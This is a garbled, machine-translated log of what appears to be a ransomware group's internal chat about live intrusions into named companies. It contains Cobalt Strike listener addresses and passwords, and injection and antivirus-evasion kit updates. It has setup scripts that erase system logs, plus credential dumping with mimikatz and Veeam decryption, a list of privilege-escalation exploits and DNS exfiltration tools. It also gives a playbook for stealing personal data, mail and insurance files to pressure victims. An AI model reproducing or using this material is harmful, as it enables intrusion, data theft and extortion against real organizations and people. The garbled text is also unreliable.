azzur's boxes have some signs that are certain find where they are and that's it should be written where he poured bekapyna I say not like you may server itself in the cludes azurai came to the conclusion that it is in the cludes azur because they are on the screenshot pin that need to change the job or delete bekapytam like 235 gig was, i had 32 copies and i don't know where the fuck it is, it was late, it was at night (i mean the drive without a letter) i fucked up NAS, local backups too, and it lets me roll backups, usually if the system is azure it says the folder is called windows azuredisk management open it, there will be an unplaced drive with the backup therewindows server backup saw how it works?you see how it works? it's not like they'll roll it back and fuck it up. you can't block it? well, the windows server is local where your backup agent hangs - it's probably the azure cloud server. the shit on the screenshot is usually a local backup server. you mean the azure server in the cloud remotely in the azure cloud cloud service. it's like https://www.pvsm.ru/images/Windows-Azure-Recovery-Services-chast-3-rabota-s-Backup-Agent-17.png what do you mean by servera azuranu not on the servera azur what do you mean bekaps somewhere in the cloud, lookup then how it worksetazur bekap agent how it looks like that there is nowhere to ask for authorization wife can go to the desktop application if you say it is there and where in the browser on the site azur?either not mail, but domain username, try domain mail and domain passstam ldap authorization in browsers nemoginov in the application itself uzura and in the service voidonu not specified anywhere there need at least a login to knowiibo it is most often under CCOv ashur cloud you will most likely get one of the domain admins that is not always available or there is another tool or just look for an account with admin pc?and it helps? I can't find it in the application://prnt.sc/vlu4i8guys, what are the options to get the account of the windows azur backup? the application itself is authorized, it probably works on the api, you can rip the account out of it or neon is not rehiddenThat? transferred? if so - add to the group on the simantek was a pass, I gmer shut down the processes and the folder simantek main removed from the pc) thus, but at least the exe it detected before, after such manipulations stopped and is nowhere in the processes after the demolition reboot simantek? if you have not rebooted, sometimes there is still an avr, but if you reset, everything that was in the lsass will fall out and you will have to wait again for someone to authorize you
hashdump may try and local hashes...simantec was, but i had to take it down, i am googling, but i still do not understand, privilege::debug is written, was it made on 2003 server? maybe it detects lsass and crashed the dump
did you try google the error? did you do privilege::debug? originally not) but then exactly x86 and the same error did you run x86 mimicatz for sure? hello gentlemen, who has met may be why the dump does not decrypt mimicatz:
```
Opening : 'lsass.dmp' file fr minidump...
Error kuhl_m_sekurlsa_acquireLSA ; Modules informations
```

I shot through procdump with windows 2003 it seems that there is no analog VNC no avs? Hello, anyone familiar with AWS, there is a network with access to the AWS lk, there are virtual machines, it created a user with the rights, is it possible how this user (newly created) to put in the domain, then on the rd to get in with the creeds. I have not dealt with this before, read the manual, did something, but alas, no luck so far, there how? I understand, in touch, let me know how things go and let's move on with these mebusi already a week to do the session prokitelst what to do?ok, i'll keep trying to sneak the network hello, i'll be in touch ok, i'll get it right away@stakan take it for yourself right away stakanAbout 2 months this case lasts? did you see? what about grandpa@all the contents of the LLVM folder overwrite the contents of the brooks-artifact-kit folder
entry points for rundll32.exe for generated dlls

```
DllRegisterServer
DllInstall
DllUnregisterServer
Control_RunDLL
``BugSuper``.
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 219946 bytes
[+] received output:
EntryPoint found
[+] received output:
Injected.
```
with parameters -m local everything works great on the machine with the session (injector,massinjector)yes, near the corresponding .cna script before you had to put it in the cobalt diru tell me where to replace these boff files, where to put)? ah, ok))) and now they will work even better they workedwait, and if injectors worked?) just replace it and everything should start
the only Bofy cna not changed? oh_o found@all Urgent update your BOF files injector, builds that are in work since monday this week with the old injector will NOT start and do not forget to reload do .cna script@all IMPORTANT
ARTIFACT KIT UPDATE
Everyone download the archive and replace the files in the folder "over", all files! I'm all ready to go! restore the computer after cleaning and formatting softswitch and otpisheponyal, I will storm it) well it's okay, he wrote, silent pokapishy steve if they did not give ′ nishtyakdali server did not give anything yet?hello + @alter need to reshoot@alter need to reshoot vidimov all the credits nevalidu steven was worked up, what to do? idle sit that network is dead, do not know what to do with it
    alex also looked into it and he doesn't know what to do.
    No vulnerabilities found on ms17.
    only polzak's creds, no brute force to admins, no local or domain one, i saw mimicatz myself, password from polzak, hashdump did not get anything
    vyacheslav kerber rez to chat with the network, from chrome did not pull anything interesting there is nothing, there are crosses from polzakov valid, but the admin pass not a single come up, on the ms17 deaf doo so brandon how are you doing in the network without anyone alive ? so what anyone do hello there is 1n, only session is not available you have only 1 server like you do how long ?i thought we were going to do the lock grid, the one that wrote the glass, what are you doinga hello, i'm looking at the same grid you gave me guys write down who's doing whattv all hey guys will be 3-4 hours, i need a break in the morning here:flint write me back as soon as the channel is createdmain windows/beacon_https/reverse_https 142.202.205.88 443 142.202.205.88mainbrandonso sorry, stupid ipi that, port 443britz listener, not access to cobalt123123098qwepoi195123.213.122 port 35464sessione youbrandon give you listenerFLYNT wait listener in the network channel`` \STORAGESRV.ecampus.com\c$\Program Files\Barracuda\Barracuda Backup Agent\database
 see backups
Should I mark such things here? Should I look at the backups at 600m? If so, what to do with this one ? i'll give you a new one on ecampus.com. i'm climbing )paralleyno do it flint now i'll find you a new one too as you say let me find you something small climbing through hosts looking for something interesting guys sign in with youstakan keep the net so who is busy sign in with youcbrad went away so he will be here soon so who is without a task hey hey@steven will be late today - lay in the morning, broke the arabs with a twin
if you have no tasks - write to me in the meantime - i will find a grid to work hello + kk hello i'm doing mine@twin do arabiq guys what are you doing hello all hello do you not know her? let her go for now what i see but with the first one what do you do the net you passed out i also passed out, but wait a little i can not connect overload probably, should come back no that the rocket stopped working??so who else is out of business and now i'll give you a plus yes come on can you pass something? 195.123.213.122 | 123123098qwepoi | 35464?tvin what are you up to? -twin, what are you up to? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, you got the stakanpole + came -titan, alexa, I'll tell you about it now -titan, you got the session -titan, if you can't understand something, feel free, here's @brad, you got it on 3.
108.177.235.22
443main windows/beacon_https/reverse_https 142.202.205.88 443 142.202.205.88pass youdavayip listener + so who on the spot unsubscribe apparently went portdavaybrad ip cobaltauk udesmoxeti stiven will now distribute) do not need to take anything myself = )stev tried to not come I wonder why the networks where to take or wait until it will come?the server is working and configured as from the first day ) if you do not need to change the settings, everything works fine
```
right, working as we did on our servers, no new settings ?
i have a similar setup from day one, so what are you guys doing ?@alter the server is working and configured like from day one ) if i don't have to change the settings, then everything works fine @alex what do you mean "no incoming data" ? i have no incoming data why i have all ok settings on my work servers - everything works fine for everybody ?
@alex finalizes the case on the astronauts then on with @jason - no need to leave unfinished in the old confeno I all helped and explained:grin: so not alone:zany_face:hello tween me no one common was not:rolling_eyes: turns out I was one:confounded:Hello all I have the old networks, with jason, outlet. Well we have there stpornu I have a little was I and jason, but it seems to me in another ти тиmeso old nets like placated "we" is who? it is still unclear at what stage now we in the astronauts still sittingAnd who needs new to workSay, anyone finish old tasks which in the old rocket still remain?:v:alter and brandon hey here guys alter and brandon still wait 10 minutes = )
if it is delayed, i'll be there for him)not enough of a handlercropped by steve all here:v:alex krasaya zdes:smiley:hey hey stakashahi +:rolling_eyes:who do we not have yetubrad hi hi:v:hi broHi everybody:v::point_up:hibradon, herethere ?case is deaddad it was transferred@all
cvmkfDe6Zh7tkWyKwljr2Z80cWSzWSHFTCxPd9OKFgvJsHhVxTdwaTgOd1EUJy12
whose? @all
cwf.fr
d-box.com
groupemontoni.com

owners of these cases - waiting for you@all
unionleader.com
thestaffzone.net

owners of these cases, please let me know how do you download them? do you download them as a packaged archive or just as a diru?
i can explain how to download from msfvenom and use it without tunneling through cobb who can explain how to make a session in msf without vpn-good manualls:thumbsup
i will test@red probably installed it the other way around, but not for sure on Ubuntu it all works yeah, it's better to install the current version@red here i foresee a problem ``apt-get install default-jdk
I showed you above how to set the TC for root, but I don't want to run the timeserver only as a user, here's my guide
1. Install the metasplot
	curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
		
		; ./msfconsole run the metasplot

2. Install Postgresql
	
	apt-get -y install postgresql
	
3. Installing Armitage

	wget http://fastandeasyhacking.com/download/armitage150813.tgz
	tar zxvf armitage150813.tgz

Initialize the metasplot base

	msfdb init

		; msfdb reinit - Deletes and reinitializes the database.
		; msfdb delete - Deletes the database.
		; msfdb start - Starts the database.
		; msfdb stop - Stops the database.
		; msfdb status - Shows the database status.

	export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml

5. Launch Armitage Teamserver

	cd /path/to/armitage
	./teamserver [external IP address] [password]
	

Useful Links

	Installing the Metasploit Framework -
		https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
	Armitage installation -
		http://www.fastandeasyhacking.com/manual

Required Packages
``````
1. take debian or ubuntu dedic (ssh username@hostname)

Check availability of postgresql

sudo apt install postgresql

sudo apt-get -y install postgresql

============================================================================================================================
2. Download and install the metasplot
     
      x64
      wget http://downloads.metasploit.com/data/releases/archive/metasploit-4.16.2-2020011301-linux-x64-installer.run
      
     Next, we modify (allow the scripts to run)

      chmod +x metasploit-4.16.2-2020011301-linux-x64-installer.run

chmod +x metasploit-4.13.0-2017022101-linux-x64-installer.run

Далее установка ./metasploit-4.16.2-2020011301-linux-x64-installer.run


https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run

============================================================================================================================
Leave all default ports and add a random local domain

domain like addada.com

============================================================================================================================
4. After installing the msf

Installing the editor

sudo apt install nano

Editing scripts 1

      nano /etc/init.d/metasploit

      #exec /opt/metasploit/ctlscript.sh "$@"
      exec /opt/metasploit/postgresql/scripts/ctl.sh "$@"

Editing scripts 2

      nano /etc/rc.local add these lines before exit 0

ln -sf /dev/null /var/log/wtmp
ln -sf /dev/null /var/run/utmp
ln -sf /dev/null /var/log/lastlog
ln -sf /dev/null /var/log/auth.log
ln -sf /dev/null /var/log/btmp
ln -sf /dev/null /var/log/dmesg
ln -sf /dev/null /var/log/faillog
ln -sf /dev/null /var/log/kern.log
ln -sf /dev/null /var/log/syslog
ln -sf /dev/null /var/log/user.log
ln -sf /dev/null /var/log/secure
ln -sf /dev/null /root/.bash_history

iptables -A INPUT -i eth0 -p tcp -m tcp --dport 3790 -j DROP
============================================================================================================================
5. Set the java to make the armitage work

apt-get update && apt-get upgrade

apt-get install default-jdk
============================================================================================================================
6. Download and unpack the armitge (toolserver) from this url (tgz archive is up to date)
      wget http://fastandeasyhacking.com/download/armitage150813.tgz
      tar zxvf armitage150813.tgz
============================================================================================================================
7. Change the port in armitage (before running) in the teamserver script near the end of the file

nano armitage/teamserver
============================================================================================================================
8. Open screen (so that you can run armitage in the background and exit the server), and run

apt-get install screen

launch the screen

cd /root/armitage && ./teamserver IP PASS (the IP of the external interface of the dedicates and the pass is more complex)
============================================================================================================================
9. Wait until everything starts and a message appears with the credentials to armitage, and exit the screen with Ctrl+a and then separately d
============================================================================================================================
10. Change SSH password (passwd root ...)
============================================================================================================================
11. (change ssh port / make authorization by key to the server)

nano /etc/ssh/sshd_config
============================================================================================================================
``mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'@atom easily if msf is properly installed
Help me raise the timserver from a normal position. you need a manual on how to raise the timserver, including this manual? but there is a problem with rights, I have not solved it in my own place. armitage guide ``http://www.fastandeasyhacking.com/manual
For 3 years now everyone has been writing on forums about this error with bundler and hems, which is why the java won't connect to you$ gem install bundler
I'll delete it later so it won't clog up the ether with this script
```
This tutorial is for Ubuntu.

the first thing we do is install nano, screen, unzip

sudo apt-get install nano screen unzip

then create file 1.sh:
nano 1.sh
Then insert the code block:

1. installing java (1.sh)
Code:

sudo apt-get update
sudo apt-get -y install --reinstall software-properties-common
sudo apt-get install default-jre
sudo apt-get update
sudo apt-get -y --force-yes install git build-essential unzip libreadline-dev zlib1g-dev nano screen libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
sudo apt-get update
sudo apt-get upgrade
cd ~
git clone git://github.com/sstephenson/rbenv.git
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

then CTRL+X (save) press Y ENTER ENTER
repeat the same for each item
set the rights:
chmod +x 1.sh
run 1.sh:
./1.sh
Now each command is executed in turn

2. installing ruby (2.sh)
Code:

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL

3. installing ruby (3.sh)
Code:

RUBYVERSION=2.4.3
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v

4. installing nmap (4.sh)
Code:

mkdir ~/Development
cd ~/Development
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install
make clean

5. create a database and a database user. execute the commands in turn (without. nano):
Code:

su postgres
cd
createuser msf -P -S -R -D
#enter password qwe31337
createdb -O msf msf
exit

6. installing msf (5.sh)
Code:

mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

7. installing armitage (6.sh)
Code:

echo cHJvZHVjdGlvbjoNCiBhZGFwdGVyOiBwb3N0Z3Jlc3FsDQogZGF0YWJhc2U6IG1zZg0KIHVzZXJuYW1lOiBtc2YNCiBwYXNzd29yZDogcXdlMzEzMzcNCiBob3N0OiAxMjcuMC4wLjENCiBwb3J0OiA1NDMyDQogcG9vbDogNzUNCiB0aW1Lb3V0OiA1DQo=|base64 --decode > /opt/metasploit-framework/config/database.yml
cd /opt/
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver


After installation, create a screen (to run in the background):
screen -dmS arm
screen -x arm
cd /opt/armitage/
Run ifconfig to check your IP
./teamserver TUT_API_WDSKI TUT_PASSWORD
``You're not clinging to it,`` for some reason your msf is crashing.
[*] Metasploit requires the Bundler gem to be installed
$ gem install bundler
``I don't even know how to comment on this, does it work? Has anyone encountered this error when starting armitage?
[*] Starting RPC daemon
[*] Metasploit requires the Bundler gem to be installed
    $ gem install bundler
[*] Sleeping for 20s (to let msfrpcd initialize)
[*] Starting Armitage team server
[*] Warning: checkError(): java.lang.RuntimeException: java.net.ConnectException: Connection refused (Connection refused) at server.sl:450schali it is,yes it puts both armagh and msf on BOX and msf should be on REMOTE BOXhttp://github.com/Matt-London/Install-Armitage-on-Linux what mushrooms are you eating?)))) it does not even need to install) and runs)) 100%armitage simply download) on the site armitage in the instructions are its installationa you armitage or a team serv? no, armitage is not through apt-get installed, and with a guitar if you do not care about the same download, there is armitage `` ``
sudo apt-get install armitage -y
cd Armitage
sudo pip3 install -r requirements.txt
sudo python3 armitage.py
```
like this on ubuntu for example koroche@slice have a suspiciona)most likely he meant the guide script for what? you can write a script yourself install it on wps? a few guys who works with armitage? ms17 - smb port
kerba - ldapfwd and without sox will work you need to throw portsox5 from polzak who started in the local area? very necessary, polzak context, crowdedstrike, 1 yes, you need at least ms17\kerbu\adfind. edr all jammed all ok) what are these numbers?@graf @slice thanksspro key I know about 5 years ago, it was so-so, now I'll try another activation key and cost 10 - 20 dollarsautokms in virustotal vgoniana any other than crack?) trust me a little too little to nimavtokms?:sweat_smile:except directly to activate))) who knows a working way to remove the activation banner windows? @red downloads may not work if the default address assigned to a domain from the Web, and he originally came through tornashel)-@red on the direct - probably because of e2e, disable it in the settings. How do I get the settings to work properly with downloads? Do not work direct-message, ie person writing in direct, he sees the notebook, but when you open the message is not, too, I'm interested in settings where and what to prescribe a servak[ ](https://stylebrooks.com/group/general?msg=Lo2gQrxif7BDytsLt) And this is from the corporation picked up, often found such charts, format ` `.vsdx ` ` and opened through VISIO ` Hey, and you yourself draw a diagram or is there any program? who is online
urgently!acunetix have you got a working one? sorry guys)understood on the "whole forest" it will only go with the wrong settings for the active directory for which you generatebecause it contains a specific domain sidgolden ticket works only in your domain's neprelekh can someone advise on kerberos::golden
created taqet, how now to connect them to the trust host? i will also take a) but later tonight will be) +1there is an urgent need to work@all have hands free? access flew fresh try to remove the backslash from the login, it escapes from this amputation
```
FC944FD5-6FA6-491F-B3AE-055AA04B8DE8 CASTCORP\Veeam_Admin AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380 21857372 2015-11 Veeam_Admin 1 2020-07-29 15:26:43.573
```
I leave only
```
Decrypt("CASTCORP\Veeam_Admin. AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380=");
why is csc.exe veeam.cs not working?
sql manament let's try either raise cobalt session and style token sklservsql manament studio poke the owner of your process "can't" in the subdialog from the context of the untrusted processwho had such an error when decrypting viam ?
```
Msg 916, Level 14, State 1, Server FRVEEAM02\VEEAMSQL2016, Line 1
The server principal "CASTCORP\CASTCJA" is unable to access the database "VeeamBackup" under the current security context.
Ookchutka late) off already Citrix) will be tomorrow) well, let's take it - see what there may be and rdp
there may be an opportunity to call citrix@alter there are cmd or rdp? @all there are willing to take citrixes to work thick? @all sicaf-cosmetiques.fr
i don't see any confinaTransAm Trucking is not our case either? i'm learning it's a startSearch for servers through a domain controller, collect information on AD: users, computers, groupsSearch and sorting users, ipins, search for sharpshoot what? hi there. i've learned how to collect information on cob, call me when something comes up, i will help you. hi, what do you want me to do?hello therevi remember) hello. you write me, don't forget about me don't have anything myself would you like me to do something for the weekendGrimnirCodeocta0dayinbizChucknimbus2000 hello yourself almost without work you sit there hello, can you help me? you got anything for me? hi, we're long with the case if you have any questions - write me
I'll clean up and update the top post later
The regulations of the case and work with data :

1. When the lock is complete, we output the following information to the corresponding confab

	https://domain.com
	100 Servers 1000 Workstations

	Mega:
	guerillamailaccount@sharklasers.com
	ComPl3xAndh3@vyP@s))91

	200 GB (here we specify the amount of data in unzipped form, if it is not clear - mark it COMPRESSED)

	COMPANY NAME creates elite transgender sex dolls for the U.S. presidential administration.

2. After that in the near future we put to merge data from the mega and prepare in parallel Data-pack

3. Data-pack is delivered in the following form

	full-listing.txt - full listing of all files downloaded from mega
	30percentlisting.txt - 30% of full-listing with special emphasis on HR/Finance folders/databases with private information
	datapack-example.zip - archive containing files from 30percentlisting.txt with priority on files containing confidential information, scans of documents, HR documents, closed projects of the company (the archive is small, weight 10-30 megabytes)

4. Insurance. In the process of data capture and in the process of their parsing, we are looking for files containing cyber-insurance conditions, standard search tags

	cyber
	policy
	insurance
	endorsement
	supplementary
	underwriting
	terms
	
	If such files with the contents of insurance conditions are found - MUST post them separately in the channel at the end of the case, they are an IMPORTANT subject of bargaining.

The presence of files on the network indicating GDPR significantly increases the success of the payment, this is the standard which is adhered to in the storage of user data, for their leakage the company faces significant fines.
Please pay attention to this abbreviation in the process of work and in the process of unloading the file listing and indicate it in the report submission.
	
5. What data you should pay special attention to
	
	Databases containing information such as: email addresses / names / addresses / payment cards / DOB / SSN / Drivers License (all such databases must be exported and samples of records from these databases are contained in the Data-pack).
	Files and databases related to company employees (they almost always contain private information similar to the one described above)
	The contents of mail servers (the correspondence is a very strong factor of pressure, unloading of the contents of mail boxes of the administrative level is IMPORTANT, if such is unloaded - it is necessary to mention it separately with a name list of employees and their positions, whose mail archives are unloaded)
	Contents of folders Accounting/Finance/HR/Projects/Confidential
	Sources of software, if any, developed in the company
	
6. The data from the mega must be downloaded in its entirety to a dedicated server
``Thank you Redbox, it's blocking via iptables``.
something else needs to be done to make it possible to do all the traffic
```
iptables? : - )@lexman might be useful
```
https://github.com/darkk/redsocks
https://habr.com/en/post/116360/
I got it, thanks, I need something else which will allow to wrap all traffic, instead of a separate progodko about all traffic I do not know, if to wrap in torghost, there is torghost https://github.com/GitHackTools/TorghostNG
You need proxychainz to start your own programs through proxychainz and run them through the terminal:
proxychains4 software_name ..atributes
github:
```
https://github.com/rofl0r/proxychains-ng
```
guide installation
```
https://en.kali.tools/?p=290
How do you wrap all the traffic to a sox/tunnel in it?
proxychains4 (proxychains-ng)
Hi all. Can you suggest a Proxifier analogue for linux I added virtualbox but hoonix can not connect to tor network if not give brandmauer permission on all outgoing connections common profile, I tried to include all rules manually added to brandmauer, all the bases of the network, prescribed ports 9002 and 9030, and still no connection without a common permit I want to prohibit in the firewall all outgoing connections except virtualbox and chrome, so that no one program can not send a single byte https://www.whonix.org/wiki/Other_Operating_Systems Explain what the problem is (are there any hoonix experts?) I can't set up the right firewall rule for hoonix to connect to the network with connections disabled without rules. I've added virtualbox in permissions and enabled all existing rules, explicitly allowed ports 9001 and 9030, but without allowing all outgoing connections for the general profile - doesn't want to connect! Can anyone know what to add to the rules that this stuff would work quite interesting but if no msf - yes ...you already have an encrypted stepping channel open )ntds you can unload and metasplotom )ntds some unload for example) hey, I think when you need to leak a little and no password, this tool can help traffic can be filmed on iplus dns is the default open protocol, it is not encrypted the speed is interesting)it is a fucked up thing most likely)test the speed on the nix, python is only needed can be useful as a substitute for the rclon, and on servers where there is no internet, but the external addresses on the dns are resolved https://darkbyte.net/exfiltrando-informacion-por-dns-con-invoke-dnsteal/
manualhttp://github.com/JoelGMSec/Invoke-DNSteal
the analogue of Rclone implemented through dns transport If so, we'll write ToR to coders, and they will try to finalize it and test it on small networks
if anything does not work - write to me or directly here, we'll figure it outPrecious I do not remember the numbers, but in this build all the useful
kernelexploits ->
MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only!
MS16-032 - (2008/7/8/10/2012)!
MS16-135 - (WS2k16 only)!
CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
CVE-2019-0841 - April 2019!
CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019!
CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019!
CVE-2019-1215 - September 2019 - x64 only!
CVE-2020-0638 - February 2020 - x64 only!
CVE-2020-0796 - SMBGhost
CVE-2020-0787 - March 2020 - all windows versions
CVE-2021-34527 - July 2021 - PrintNightmare
Juicy-Potato Exploit
itm4ns Printspoofer
``https://github.com/S3cur3Th1sSh1t/WinPwnя got you.'' small nets a couple of times in a week out of 5okay.
I need statistics (roughly, of course), how often zerologon works, for example, if you see that on the ms17 all zatchedoklejka thinga specifically rce / lpe 2020 and 21 years old does anyone in the work use any slots besides ms17? https://github.The registry, I can send you the script when you have 100 machines, it's already a pain in the ass, I also had to remove it through the registry and then reboot the registry
it will not let you locate
1 machine usually can be found without an averter, but through -p \\drygoj_host\c$ does not allow to locatefosos need to remove the handpoint? have the rights of the admin? or an overwriting algorithm in the filemaybe it redmi panes and does not allow to damat good to zadebat what sofos not like massa he will tear it down?signature? a few thousand dollars? on the exploit saw that there is a utility that brings down sofos, but you need to sign the driver, and this is also a kind of gemmornuzhdenu debug
sofos found a way to bypass the bypass? whether or what else it stalls, it does not allow you to screw in the screws with panda also acerttnoe on the automated data drain, but as far as I know it still in the planahalter like ordered some softbro here one way all rests in the human factor and the administrator, his laziness.  You can drain 1tb and no one will get off his ass, but you can spill your guts in 10 minutes so there are pros and cons everywhere, but it's better to download through rdp + geolocation too that all this would be automatedNu need to create a cluster of servers through the laying will be normal or write a custom client and pump out somewhere-by the way, the solution - to pump somewhere on the dedic- that plilinu by the way about the mega - that it will banish accounts on any sneeze is expected, It is possible that sooner or later we will come to the fact that it will be impossible to use it at all, as a complaint) can - but banned actors with info - undesirableAA https://mega.nz/cmd has anyone tried?
as a matter of fact it is possible to give commands via kobuzachem it nadprosto can nu ne rigidno)well if you understand it all you probably also understand that there is no ideal way)i saw solutions to limit traffic, like even through the client mega can do to "smear" evenlynos 2 to 4 am will be peak traffic, then quiet
any admin will add 2 +2, and it's no problem to look who and where was leaked from if you leak 100+ gb of traffic at night. imagine how it would look in network admin systems? there the main idea is to camouflage yourself as legitimate traffic backpack to sftp, pack it in a password protected archive and upload it somewhere on fileshare
the best way I do not know better but at a breakage will need to download the connection is not secured by sftp on port 22) well you can put ssl almost all takes on the networka dlp quite a serious thing-plus comrades suggest that if the fftp connection will break the download will be interrupted and everything will have to be unloaded again I do not know which of these is more paleTo make a fundamental difference, you need to open the upload server inside the network (or better to use the existing one) and take the outside dateFor starters, pack the entire date with a password archive, then the system type DLP will not be able to peek and see what you're pumping there, you will see just a big chunk of traffic and all the same traffic goes out to the left domain, whether the domain mega or some otherprincipal difference between the two methods you gave no not so easy all pumped a little, but with the admin wheelbarrow, perhaps more simantickakoy AV ?the idea is that admins can fire on the network traffic, if you downloaded a lot and loaded the channel and could burn, but it's not exactly us can fire, when the balls go from Yes?
The situation is as follows, the session is dead and the host is pinging
Only I accessed balloons and downloaded files from it, no other actions

But not all files downloaded, there was such an error:
[*] started downloading of \\123\\c$\Users\123.pdf (512611 bytes)
[-] download of 123.pdf closed. [Incomplete]write @steven or @hearda suggest cryptocurrencies pailoadconnects stores in logs C:\Program Files\Fortinet\FortiClient\logs
thanks to memory only+connect profile from appdata usually helps with chrome to yank all passages they are tied to ldap as a ruleHi
can you tell me please where FortiClient (fortik vpn) stores the credentials?alex and i'll give you the net now everything is ok nowwoi everything should be ok now re-login i'm not, i have to bother to read your messages maybe i have not enough rights to email you? yeah ok give me the full composition of hell from here guys, from viam i got these creeds login:pass, who can tell me what is it?)
```
8a29ab8d-d896-4e37-a68e-159f49309c4d : 9ecc8be6-38a2-4c48-8c54-147487d9b036
a9b16cb3-2da2-487d-ac15-78fb84432381 : 04d075dc-c459-4607-97e8-d513efb5abeb
``understood ... )anyways sessions re-shoot the kobyd does not matter which one I did not mean it) I have 4.2 kobyd did not download) hello, have you anything to do? or all already downloaded? it does not re-shoottut what? moved? if so - add to the groupI did not even look, but it probably makes sense to look Anybody downloaded the manuals that leaked on the XSS forum? Is there anything useful????аha okche can you think of? I've already tried a million variations and still nothing comes outThough by web domain babelendu some removed house bluepathfinance with domain goodvibsi removed they type "5baftI06a0yitk0SBmQh4T1mip01shZTHVdUPyxDYN0= 1 jkinnen Fordo55! goodvibes" although they are exactly right because they were taken off the same ones the second one will not be correctesonik through extender or the web does not want to take passwordswithout an opinion I'll do it when I come backwrite just a list of ip addresses where you need to rewrite it ok
take it off the day after tomorrow i wrote a list of ipaks 3 hours ago)damn late)@alter this one needs to be reshotasdf7f814vycfasUPDATE: added new patterns for stageless loads@all IMPORTANT
ARTIFACT KIT UPDATE
Everyone download the archive and replace the files in the "over" folder, all files!
The current version of cobalt is patched with a Java hook where the EICAR trial print is removed.
Requires jdk13 on vinda to run :
Add this to the batcnik
	@echo off
	pushd %~dp0
	set PATH="C:\Program Files\Java\jdk-13.0.2\bin\"
	
To run on Ubuntu :
startup string
	java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar $*

installing the right Java :
	sudo add-apt-repository ppa:linuxuprising/java
	sudo apt install oracle-java15-installer
	
	java -version
	java version "15.0.1" 2020-10-20
	Java(TM) SE Runtime Environment (build 15.0.1+9-18)
	Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing)

For those who have Kali (Debian) :
https://www.linuxuprising.com/2020/09/how-to-install-oracle-java-15-on-ubuntu.html

There will be a section below
Install Oracle Java 15 on Ubuntu, Debian, Linux Mint, Pop!_OS, Zorin OS and others using an APT PPA repository

Included in the package in the folder
	Cobalt42_v2/Toolkits/artifact/brooks-artifact-kit/
is artifact.cna, which must be imported into cobalt to generate internal native loads and staged loads to run.

At the moment the situation with the detects is as follows :
https://dyncheck.com/scan/id/eeab696158db737d90da83a0ebf7bc53 - dll x64
https://dyncheck.com/scan/id/f656a34930eb682d6cab252798234f7c - service-exe-x64
https://dyncheck.com/scan/id/32c29f3ba498be4915bb72d4bae824ce - staged payload x64

All of these loads are used not only to manually run the files, but also to jump functionality.
